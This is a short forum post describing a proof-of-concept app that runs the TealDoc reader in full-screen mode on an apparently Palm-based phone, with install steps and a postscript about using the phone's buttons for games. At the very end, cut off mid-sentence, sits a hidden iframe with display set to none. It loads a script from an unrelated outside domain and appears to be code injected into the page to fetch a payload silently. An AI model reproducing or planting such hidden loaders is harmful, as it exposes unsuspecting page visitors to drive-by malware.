Example: TealDoc in Full Screen
I meant to send this out yesterday, but then the net broke in my house. I've got a few minutes and a net connection, so I figured I'd post.
How to use:
1) Install TealDoc from TealPoint software.
2) Install a few documents to view in TealDoc.
3) Make sure TealDoc is working correctly, and that you can view the documents in non-full size mode.
4) Install this app. It will do the following:
- Switch to full screen mode
- Launch TealDoc
- Wait for TealDoc to quit
- Restore normal screen operation.
I personally really like the rotated full screen view so that the top of the screen is near the antenna.
Note that TealDoc doesn't really support this all that well. The buttons aren't drawn correctly, some buttons are missing, and the "hotspots" that you tap to activate buttons seem to be off slightly.
Anyhow, it doesn't work 100% but its a proof of concept.
Use at your own risk,
Jake
P.s. This got me thinking, though. Imagine Liberty or some other game where you hold the phone with the buttons in your right had (left right would be the scoll button, up would be phone, down ToDo) and then use your index finger of your other hand to operate two buttons (vol up and voice memo) for your "A/B" buttons. I think a game controller in this configuration would be good for gameplay (except maybe for up/right up/left on the direction arrows, but you could use the Sched/Notepad buttons for those...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
